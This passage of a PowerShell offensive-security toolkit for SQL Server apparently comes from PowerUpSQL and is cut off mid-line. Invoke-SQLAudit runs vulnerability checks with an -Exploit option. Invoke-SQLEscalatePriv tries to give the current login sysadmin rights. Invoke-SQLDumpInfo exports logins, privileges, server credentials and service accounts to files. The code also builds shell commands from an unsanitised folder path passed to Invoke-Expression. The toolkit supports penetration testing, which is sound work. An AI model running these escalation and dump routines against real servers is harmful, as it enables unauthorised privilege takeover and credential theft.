-eq $null } | ForEach-Object -Process { $runspaces.remove($_) } #sleep for a bit if we will loop again if($PSBoundParameters['Wait']) { Start-Sleep -Milliseconds $SleepTimer } #Loop again only if -wait parameter and there are more runspaces to process } while ($more -and $PSBoundParameters['Wait']) #End of runspace function } #endregion functions #region Init if($PSCmdlet.ParameterSetName -eq 'ScriptFile') { $ScriptBlock = [scriptblock]::Create( $(Get-Content $ScriptFile | Out-String) ) } elseif($PSCmdlet.ParameterSetName -eq 'ScriptBlock') { #Start building parameter names for the param block [string[]]$ParamsToAdd = '$_' if( $PSBoundParameters.ContainsKey('Parameter') ) { $ParamsToAdd += '$Parameter' } $UsingVariableData = $null # This code enables $Using support through the AST. # This is entirely from Boe Prox, and his https://github.com/proxb/PoshRSJob module; all credit to Boe! if($PSVersionTable.PSVersion.Major -gt 2) { #Extract using references $UsingVariables = $ScriptBlock.ast.FindAll({ $args[0] -is [System.Management.Automation.Language.UsingExpressionAst] },$true) If ($UsingVariables) { $List = New-Object -TypeName 'System.Collections.Generic.List`1[System.Management.Automation.Language.VariableExpressionAst]' ForEach ($Ast in $UsingVariables) { [void]$List.Add($Ast.SubExpression) } $UsingVar = $UsingVariables | Group-Object -Property SubExpression | ForEach-Object -Process { $_.Group | Select-Object -First 1 } #Extract the name, value, and create replacements for each $UsingVariableData = ForEach ($Var in $UsingVar) { Try { $Value = Get-Variable -Name $Var.SubExpression.VariablePath.UserPath -ErrorAction Stop [pscustomobject]@{ Name = $Var.SubExpression.Extent.Text Value = $Value.Value NewName = ('$__using_{0}' -f $Var.SubExpression.VariablePath.UserPath) NewVarName = ('__using_{0}' -f $Var.SubExpression.VariablePath.UserPath) } } Catch { Write-Error -Message "$($Var.SubExpression.Extent.Text) is not a valid Using: variable!" } } $ParamsToAdd += $UsingVariableData | Select-Object -ExpandProperty NewName -Unique $NewParams = $UsingVariableData.NewName -join ', ' $Tuple = [Tuple]::Create($List, $NewParams) $bindingFlags = [Reflection.BindingFlags]'Default,NonPublic,Instance' $GetWithInputHandlingForInvokeCommandImpl = ($ScriptBlock.ast.gettype().GetMethod('GetWithInputHandlingForInvokeCommandImpl',$bindingFlags)) $StringScriptBlock = $GetWithInputHandlingForInvokeCommandImpl.Invoke($ScriptBlock.ast,@($Tuple)) $ScriptBlock = [scriptblock]::Create($StringScriptBlock) #Write-Verbose $StringScriptBlock } } $ScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock("param($($ParamsToAdd -Join ', '))`r`n" + $ScriptBlock.ToString()) } else { Throw 'Must provide ScriptBlock or ScriptFile' Break } Write-Debug -Message "`$ScriptBlock: $($ScriptBlock | Out-String)" If (-not($SuppressVerbose)){ Write-Verbose -Message 'Creating runspace pool and session states' } #If specified, add variables and modules/snapins to session state $sessionstate = [System.Management.Automation.Runspaces.InitialSessionState]::CreateDefault() if ($ImportVariables) { if($UserVariables.count -gt 0) { foreach($Variable in $UserVariables) { $sessionstate.Variables.Add( (New-Object -TypeName System.Management.Automation.Runspaces.SessionStateVariableEntry -ArgumentList $Variable.Name, $Variable.Value, $null) ) } } } if ($ImportModules) { if($UserModules.count -gt 0) { foreach($ModulePath in $UserModules) { $sessionstate.ImportPSModule($ModulePath) } } if($UserSnapins.count -gt 0) { foreach($PSSnapin in $UserSnapins) { [void]$sessionstate.ImportPSSnapIn($PSSnapin, [ref]$null) } } } # -------------------------------------------------- #region - Import Session Functions # -------------------------------------------------- # Import functions from the current session into the RunspacePool sessionstate if($ImportSessionFunctions) { # Import all session functions into the runspace session state from the current one Get-ChildItem -Path Function:\ | Where-Object -FilterScript { $_.name -notlike '*:*' } | Select-Object -Property name -ExpandProperty name | ForEach-Object -Process { # Get the function code $Definition = Get-Content -Path "function:\$_" -ErrorAction Stop # Create a sessionstate function with the same name and code $SessionStateFunction = New-Object -TypeName System.Management.Automation.Runspaces.SessionStateFunctionEntry -ArgumentList "$_", $Definition # Add the function to the session state $sessionstate.Commands.Add($SessionStateFunction) } } #endregion #Create runspace pool $runspacepool = [runspacefactory]::CreateRunspacePool(1, $Throttle, $sessionstate, $Host) $runspacepool.Open() #Write-Verbose "Creating empty collection to hold runspace jobs" $Script:runspaces = New-Object -TypeName System.Collections.ArrayList #If inputObject is bound get a total count and set bound to true $bound = $PSBoundParameters.keys -contains 'InputObject' if(-not $bound) { [System.Collections.ArrayList]$allObjects = @() } <# #Set up log file if specified if( $LogFile ){ New-Item -ItemType file -path $logFile -force | Out-Null ("" | Select Date, Action, Runtime, Status, Details | ConvertTo-Csv -NoTypeInformation -Delimiter ";")[0] | Out-File $LogFile } #write initial log entry $log = "" | Select Date, Action, Runtime, Status, Details $log.Date = Get-Date $log.Action = "Batch processing started" $log.Runtime = $null $log.Status = "Started" $log.Details = $null if($logFile) { ($log | convertto-csv -Delimiter ";" -NoTypeInformation)[1] | Out-File $LogFile -Append } #> $timedOutTasks = $false #endregion INIT } Process { #add piped objects to all objects or set all objects to bound input object parameter if($bound) { $allObjects = $InputObject } Else { [void]$allObjects.add( $InputObject ) } } End { #Use Try/Finally to catch Ctrl+C and clean up. Try { #counts for progress $totalCount = $allObjects.count $script:completedCount = 0 $startedCount = 0 foreach($object in $allObjects) { #region add scripts to runspace pool #Create the powershell instance, set verbose if needed, supply the scriptblock and parameters $powershell = [powershell]::Create() if ($VerbosePreference -eq 'Continue') { [void]$powershell.AddScript({ $VerbosePreference = 'Continue' }) } [void]$powershell.AddScript($ScriptBlock).AddArgument($object) if ($Parameter) { [void]$powershell.AddArgument($Parameter) } # $Using support from Boe Prox if ($UsingVariableData) { Foreach($UsingVariable in $UsingVariableData) { #Write-Verbose "Adding $($UsingVariable.Name) with value: $($UsingVariable.Value)" [void]$powershell.AddArgument($UsingVariable.Value) } } #Add the runspace into the powershell instance $powershell.RunspacePool = $runspacepool #Create a temporary collection for each runspace $temp = '' | Select-Object -Property PowerShell, StartTime, object, Runspace $temp.PowerShell = $powershell $temp.StartTime = Get-Date $temp.object = $object #Save the handle output when calling BeginInvoke() that will be used later to end the runspace $temp.Runspace = $powershell.BeginInvoke() $startedCount++ #Add the temp tracking info to $runspaces collection #Write-Verbose ( "Adding {0} to collection at {1}" -f $temp.object, $temp.starttime.tostring() ) $null = $runspaces.Add($temp) #loop through existing runspaces one time Get-RunspaceData #If we have more running than max queue (used to control timeout accuracy) #Script scope resolves odd PowerShell 2 issue $firstRun = $true while ($runspaces.count -ge $script:MaxQueue) { #give verbose output if($firstRun) { #Write-Verbose "$($runspaces.count) items running - exceeded $Script:MaxQueue limit." } $firstRun = $false #run get-runspace data and sleep for a short while Get-RunspaceData Start-Sleep -Milliseconds $SleepTimer } #endregion add scripts to runspace pool } #Write-Verbose ( "Finish processing the remaining runspace jobs: {0}" -f ( @($runspaces | Where {$_.Runspace -ne $Null}).Count) ) Get-RunspaceData -wait if (-not $Quiet) { Write-Progress -Activity 'Running Query' -Status 'Starting threads' -Completed } } Finally { #Close the runspace pool, unless we specified no close on timeout and something timed out if ( ($timedOutTasks -eq $false) -or ( ($timedOutTasks -eq $true) -and ($NoCloseOnTimeout -eq $false) ) ) { If (-not($SuppressVerbose)){ Write-Verbose -Message 'Closing the runspace pool' } $runspacepool.close() } #collect garbage [gc]::Collect() } } } # Source: http://www.padisetty.com/2014/05/powershell-bit-manipulation-and-network.html # Notes: Changed name from checkSubnet to Test-Subnet (Approved Verbs) function Test-Subnet ([string]$cidr, [string]$ip) { $network, [int]$subnetlen = $cidr.Split('/') $a = [uint32[]]$network.split('.') [uint32] $unetwork = ($a[0] -shl 24) + ($a[1] -shl 16) + ($a[2] -shl 8) + $a[3] $mask = (-bnot [uint32]0) -shl (32 - $subnetlen) $a = [uint32[]]$ip.split('.') [uint32] $uip = ($a[0] -shl 24) + ($a[1] -shl 16) + ($a[2] -shl 8) + $a[3] $unetwork -eq ($mask -band $uip) } #endregion ######################################################################### # #region Primary FUNCTIONs # Invoke-SQLDump, Invoke-SQLAudit, Invoke-SQLEscalatePriv # ######################################################################### # ---------------------------------- # Invoke-SQLAudit # ---------------------------------- # Author: Scott Sutherland Function Invoke-SQLAudit { <# .SYNOPSIS Audit for high impact weak configurations by running all privilege escalation checks. Note: Use the Exploit flag to attempt to obtain sysadmin privileges. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER NoOutput Don't output anything. .PARAMETER Exploit Exploit vulnerable issues. .PARAMETER OutFolder Folder to write results to csv. .EXAMPLE PS C:\> Invoke-SQLAudit -Instance SQLServer1\STANDARDDEV2014 -user evil -Password Password123! ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 Vulnerability : PERMISSION - IMPERSONATE LOGIN Description : The current SQL Server login can impersonate other logins. This may allow an authenticated login to gain additional privileges. Remediation : Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user] Severity : High IsVulnerable : Yes IsExploitable : Yes Exploited : No ExploitCmd : Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\STANDARDDEV2014 -Exploit Details : evil can impersonate the sa SYSADMIN login. This test was ran with the evil login. Reference : https://msdn.microsoft.com/en-us/library/ms181362.aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016 [TRUNCATED] .EXAMPLE PS C:\> Invoke-SQLAudit -Instance SQLServer1\STANDARDDEV2014 -user evil -Password Password123! -Exploit ComputerName : SQLServer1 Instance : SQLServer1\STANDARDDEV2014 Vulnerability : PERMISSION - IMPERSONATE LOGIN Description : The current SQL Server login can impersonate other logins. This may allow an authenticated login to gain additional privileges. Remediation : Consider using an alterative to impersonation such as signed stored procedures. Impersonation is enabled using a command like: GRANT IMPERSONATE ON Login::sa to [user]. It can be removed using a command like: REVOKE IMPERSONATE ON Login::sa to [user] Severity : High IsVulnerable : Yes IsExploitable : Yes Exploited : Yes ExploitCmd : Invoke-SQLAuditPrivImpersonateLogin -Instance SQLServer1\STANDARDDEV2014 -Exploit Details : evil can impersonate the sa SYSADMIN login. This test was ran with the evil login. Reference : https://msdn.microsoft.com/en-us/library/ms181362.aspx Author : Scott Sutherland (@_nullbind), NetSPI 2016 .EXAMPLE PS C:\> Invoke-SQLAudit -Instance SQLServer1\STANDARDDEV2014 -user evil -Password Password123! -OutFolder c:\temp [TRUNCATED] #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = "Don't output anything.")] [switch]$NoOutput, [Parameter(Mandatory = $false, HelpMessage = 'Exploit vulnerable issues.')] [switch]$Exploit, [Parameter(Mandatory = $false, HelpMessage = 'Folder to write results to csv.')] [string]$OutFolder ) Begin { # Table for output $TblData = New-Object -TypeName System.Data.DataTable $null = $TblData.Columns.Add('ComputerName') $null = $TblData.Columns.Add('Instance') $null = $TblData.Columns.Add('Vulnerability') $null = $TblData.Columns.Add('Description') $null = $TblData.Columns.Add('Remediation') $null = $TblData.Columns.Add('Severity') $null = $TblData.Columns.Add('IsVulnerable') $null = $TblData.Columns.Add('IsExploitable') $null = $TblData.Columns.Add('Exploited') $null = $TblData.Columns.Add('ExploitCmd') $null = $TblData.Columns.Add('Details') $null = $TblData.Columns.Add('Reference') $null = $TblData.Columns.Add('Author') # Table for escalation functions $TblVulnFunc = New-Object -TypeName System.Data.DataTable $null = $TblVulnFunc.Columns.Add('FunctionName') $null = $TblVulnFunc.Columns.Add('Type') $TblVulnFunc.Clear() Write-Verbose -Message 'LOADING VULNERABILITY CHECKS.' # Load list of vulnerability check functions - Server / database $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditDefaultLoginPw ','Server') $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditWeakLoginPw','Server') $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditPrivImpersonateLogin','Server') $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditPrivServerLink','Server') $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditPrivTrustworthy','Database') $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditPrivDbChaining','Database') $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditPrivCreateProcedure','Database') $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditPrivXpDirtree','Database') $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditPrivXpFileexist','Database') $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditRoleDbDdlAdmin','Database') $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditRoleDbOwner','Database') $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditSampleDataByColumn','Database') $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditSQLiSpExecuteAs','Database') $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditSQLiSpSigned','Database') $null = $TblVulnFunc.Rows.Add('Invoke-SQLAuditPrivAutoExecSp','Database') Write-Verbose -Message 'RUNNING VULNERABILITY CHECKS.' } Process { # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { Return } # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Status user Write-Verbose -Message "$Instance : RUNNING VULNERABILITY CHECKS..." # Iterate through each function $TblVulnFunc | ForEach-Object -Process { # Get function name $FunctionName = $_.FunctionName # Run function if($Exploit) { $TblTemp = Invoke-Expression -Command "$FunctionName -Instance '$Instance' -Username '$Username' -Password '$Password' -Exploit" } else { $TblTemp = Invoke-Expression -Command "$FunctionName -Instance '$Instance' -Username '$Username' -Password '$Password'" } # Append function output to results table $TblData = $TblData + $TblTemp } # Status user Write-Verbose -Message "$Instance : COMPLETED VULNERABILITY CHECK." } End { # Status user Write-Verbose -Message 'COMPLETED ALL VULNERABILITY CHECKS.' # Setup output directory and write results if($OutFolder) { $OutFolderCmd = "echo test > $OutFolder\test.txt" $CheckAccess = (Invoke-Expression -Command $OutFolderCmd) 2>&1 if($CheckAccess -like '*denied.') { Write-Verbose -Object 'Access denied to output directory.' Return } else { Write-Verbose -Message 'Verified write access to output directory.' $RemoveCmd = "del $OutFolder\test.txt" Invoke-Expression -Command $RemoveCmd $OutPutInstance = $Instance.Replace('\','-').Replace(',','-') $OutPutPath = "$OutFolder\"+'PowerUpSQL_Audit_Results_'+$OutPutInstance+'.csv' $OutPutInstance $OutPutPath $TblData | Export-Csv -NoTypeInformation $OutPutPath } } # Return full results table if ( -not $NoOutput) { Return $TblData } } } # ---------------------------------- # Invoke-SQLEscalatePriv # ---------------------------------- # Author: Scott Sutherland Function Invoke-SQLEscalatePriv { <# .SYNOPSIS This function can be used to attempt to obtain sysadmin privileges via identify vulnerabilities. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .EXAMPLE PS C:\> Invoke-SQLEscalatePriv -Instance SQLServer1\STANDARDDEV2014 -Username evil -Password Password123! #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance ) Begin { } Process { # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { Return } # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } # Check for sysadmin Write-Verbose -Message "$Instance : Checking if you're already a sysadmin..." $IsSysadmin = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin if($IsSysadmin -eq 'Yes') { Write-Verbose -Message "$Instance : You are, so nothing to do here. :)" } else { Write-Verbose -Message "$Instance : You're not a sysadmin, attempting to change that..." Invoke-SQLAudit -Instance $Instance -Username $Username -Password $Password -Credential $Credential -NoOutput -Exploit # Check for sysadmin again $IsSysadmin2 = Get-SQLSysadminCheck -Instance $Instance -Credential $Credential -Username $Username -Password $Password -SuppressVerbose | Select-Object -Property IsSysadmin -ExpandProperty IsSysadmin if($IsSysadmin2 -eq 'Yes') { Write-Verbose -Message "$Instance : Success! You are now a sysadmin!" } else { Write-Verbose -Message "$Instance : Fail. We couldn't get you sysadmin access today." } } } End { } } # ---------------------------------- # Invoke-SQLDumpInfo # ---------------------------------- # Author: Scott Sutherland Function Invoke-SQLDumpInfo { <# .SYNOPSIS This function can be used to attempt to obtain sysadmin privileges via identify vulnerabilities. It supports both csv and xml output. .PARAMETER Username SQL Server or domain account to authenticate with. .PARAMETER Password SQL Server or domain account password to authenticate with. .PARAMETER Credential SQL Server credential. .PARAMETER Instance SQL Server instance to connection to. .PARAMETER XML Generate xml output instead of csv. .PARAMETER OutFolder Output to a specific path instead of the current directory. .EXAMPLE PS C:\> Get-SQLInstanceLocal | Invoke-SQLDumpInfo -Verbose .EXAMPLE PS C:\> Invoke-SQLDumpInfo -Verobse -Instance SQLServer1\STANDARDDEV2014 -Username evil -Password Password123! #> [CmdletBinding()] Param( [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account to authenticate with.')] [string]$Username, [Parameter(Mandatory = $false, HelpMessage = 'SQL Server or domain account password to authenticate with.')] [string]$Password, [Parameter(Mandatory = $false, HelpMessage = 'Windows credentials.')] [System.Management.Automation.PSCredential] [System.Management.Automation.Credential()]$Credential = [System.Management.Automation.PSCredential]::Empty, [Parameter(Mandatory = $false, ValueFromPipelineByPropertyName = $true, HelpMessage = 'SQL Server instance to connection to.')] [string]$Instance, [Parameter(Mandatory = $false, HelpMessage = 'Folder to write output to.')] [string]$OutFolder, [Parameter(Mandatory = $false, HelpMessage = 'Write output to xml files.')] [switch]$xml, [Parameter(Mandatory = $false, HelpMessage = 'Write output to csv files.')] [switch]$csv ) Begin { # Setup output directory if($OutFolder) { $OutFolderCmd = "echo test > $OutFolder\test.txt" } else { $OutFolder = '.' $OutFolderCmd = "echo test > $OutFolder\test.txt" } # Create output folder $CheckAccess = (Invoke-Expression -Command $OutFolderCmd) 2>&1 if($CheckAccess -like '*denied.') { Write-Host -Object 'Access denied to output directory.' Return } else { Write-Verbose -Message 'Verified write access to output directory.' $RemoveCmd = "del $OutFolder\test.txt" Invoke-Expression -Command $RemoveCmd } } Process { # Test connection to server $TestConnection = Get-SQLConnectionTest -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose | Where-Object -FilterScript { $_.Status -eq 'Accessible' } if(-not $TestConnection) { Return } # Default connection to local default instance if(-not $Instance) { $Instance = $env:COMPUTERNAME } Write-Verbose -Message "$Instance - START..." $OutPutInstance = $Instance.Replace('\','-').Replace(',','-') # Getting Databases Write-Verbose -Message "$Instance - Getting non-default databases..." $Results = Get-SQLDatabase -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Databases.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Databases.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting DatabaseUsers Write-Verbose -Message "$Instance - Getting database users for databases..." $Results = Get-SQLDatabaseUser -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_Users.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_Users.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting DatabasePrivs Write-Verbose -Message "$Instance - Getting privileges for databases..." $Results = Get-SQLDatabasePriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_privileges.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_privileges.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting DatabaseRoles Write-Verbose -Message "$Instance - Getting database roles..." $Results = Get-SQLDatabaseRole -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_roles.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_roles.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting DatabaseRoleMembers Write-Verbose -Message "$Instance - Getting database role members..." $Results = Get-SQLDatabaseRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_role_members.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_role_members.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting DatabaseTables Write-Verbose -Message "$Instance - Getting database schemas..." $Results = Get-SQLDatabaseSchema -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_schemas.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_schemas.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting DatabaseTables Write-Verbose -Message "$Instance - Getting database tables..." $Results = Get-SQLTable -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_tables.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_tables.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting DatabaseViews Write-Verbose -Message "$Instance - Getting database views..." $Results = Get-SQLView -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_views.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_views.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting Database Tables Write-Verbose -Message "$Instance - Getting database columns..." $Results = Get-SQLColumn -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose -NoDefaults if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_columns.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_columns.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting Server Logins Write-Verbose -Message "$Instance - Getting server logins..." $Results = Get-SQLServerLogin -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_logins.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_logins.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting Server Logins Write-Verbose -Message "$Instance - Getting server configuration settings..." $Results = Get-SQLServerConfiguration -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_Configuration.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_Configuration.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting Server Privs Write-Verbose -Message "$Instance - Getting server privileges..." $Results = Get-SQLServerPriv -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_privileges.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_privileges.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting Server Roles Write-Verbose -Message "$Instance - Getting server roles..." $Results = Get-SQLServerRole -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_roles.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_roles.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting Server Role Members Write-Verbose -Message "$Instance - Getting server role members..." $Results = Get-SQLServerRoleMember -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_rolemembers.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_rolemembers.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting Server Links Write-Verbose -Message "$Instance - Getting server links..." $Results = Get-SQLServerLink -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_links.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_links.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting Server Credentials Write-Verbose -Message "$Instance - Getting server credentials..." $Results = Get-SQLServerCredential -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_credentials.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_credentials.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting Service Accounts Write-Verbose -Message "$Instance - Getting SQL Server service accounts..." $Results = Get-SQLServiceAccount -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Service_accounts.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Service_accounts.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting Stored Procedures Write-Verbose -Message "$Instance - Getting stored procedures..." $Results = Get-SQLStoredProcedure -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting Custom XP Stored Procedures Write-Verbose -Message "$Instance - Getting custom extended stored procedures..." $Results = Get-SQLStoredProcedureXP -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure_xp.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure_xp.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting server policy Write-Verbose -Message "$Instance - Getting server policies..." $Results = Get-SQLServerPolicy -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_policy.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Server_policy.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting potential SQLi Stored Procedures Write-Verbose -Message "$Instance - Getting stored procedures with potential SQL Injection..." $Results = Get-SQLStoredProcedureSQLi -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure_sqli.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure_sqli.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting startup Stored Procedures Write-Verbose -Message "$Instance - Getting startup stored procedures..." $Results = Get-SQLStoredProcedureAutoExec -Instance $Instance -Username $Username -Password $Password -Credential $Credential -SuppressVerbose if($xml) { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure_startup.xml' $Results | Export-Clixml $OutPutPath } else { $OutPutPath = "$OutFolder\$OutPutInstance"+'_Database_stored_procedure_startup.csv' $Results | Export-Csv -NoTypeInformation $OutPutPath } # Getting CLR Stored Procedures Write-Verbose -Message "$Instance - Getting CLR stored procedures..." $Results = Get-SQLStoredProcedureCLR -Instance $Instance -Username $Username -Password $Password 